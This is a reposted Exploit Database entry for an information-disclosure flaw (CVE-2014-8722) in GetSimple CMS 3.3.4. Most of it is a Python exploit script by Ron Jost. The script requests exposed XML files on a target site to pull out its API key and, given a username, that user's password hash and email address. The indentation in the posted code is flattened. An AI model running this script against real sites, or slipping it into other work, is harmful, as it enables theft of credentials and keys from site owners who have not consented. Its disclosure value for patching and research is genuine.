GetSimple CMS 3.3.4 – Information Disclosure

• Exploit Database
• 10 阅读

• 作者： Ron Jost
  日期： 2021-06-02
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49928/

• # Exploit Title: GetSimple CMS 3.3.4 - Information Disclosure
  # Date 01.06.2021
  # Exploit Author: Ron Jost (Hacker5preme)
  # Vendor Homepage: http://get-simple.info/
  # Software Link: https://github.com/GetSimpleCMS/GetSimpleCMS/archive/refs/tags/v3.3.4.zip
  # Version: 3.3.4
  # CVE: CVE-2014-8722
  # Documentation: https://github.com/Hacker5preme/Exploits#CVE-2014-8722-Exploit
  
  
  '''
  Description:
  GetSimple CMS 3.3.4 allows remote attackers to obtain sensitive information via a direct request to
  (1) data/users/<username>.xml,
  (2) backups/users/<username>.xml.bak,
  (3) data/other/authorization.xml, or
  (4) data/other/appid.xml.
  '''
  
  
  '''
  Import required modules:
  '''
  import sys
  import requests
  
  '''
  User-Input:
  '''
  target_ip = sys.argv[1]
  target_port = sys.argv[2]
  cmspath = sys.argv[3]
  print('')
  username = input("Do you know the username? Y/N: ")
  if username == 'Y':
  print('')
  username = True
  username_string = input('Please enter the username: ')
  else:
  print('')
  username = False
  print('No problem, you will still get the API key')
  
  
  '''
  Get Api-Key:
  '''
  url = 'http://' + target_ip + ':' + target_port + cmspath + '/data/other/authorization.xml'
  header = {
  "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0",
  "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
  "Accept-Language": "de,en-US;q=0.7,en;q=0.3",
  "Accept-Encoding": "gzip, deflate",
  "Connection": "close",
  "Upgrade-Insecure-Requests": "1",
  "Cache-Control": "max-age=0"
  }
  x = requests.get(url, headers=header).text
  start = x.find('[') + 7
  end = x.find(']')
  api_key = x[start:end]
  print('')
  print('Informations:')
  print('')
  print('[*] API Key: ' + api_key)
  
  
  if username:
  '''
  Get Email and Passwordhash:
  '''
  url = "http://" + target_ip + ':' + target_port + cmspath + '/data/users/' + username_string + '.xml'
  header = {
  "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0",
  "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
  "Accept-Language": "de,en-US;q=0.7,en;q=0.3",
  "Accept-Encoding": "gzip, deflate",
  "Connection": "close",
  "Upgrade-Insecure-Requests": "1",
  "Cache-Control": "max-age=0"
  }
  x = requests.get(url, headers=header).text
  start =x[x.find('PWD>'):]
  passwordhash = start[start.find('>') +1 :start.find('<')]
  print('[*] Hashed Password: ' + passwordhash)
  
  start = x[x.find('EMAIL>'):]
  email = start[start.find('>') + 1 : start.find('<')]
  print('[*] Email: ' + email)
  print('')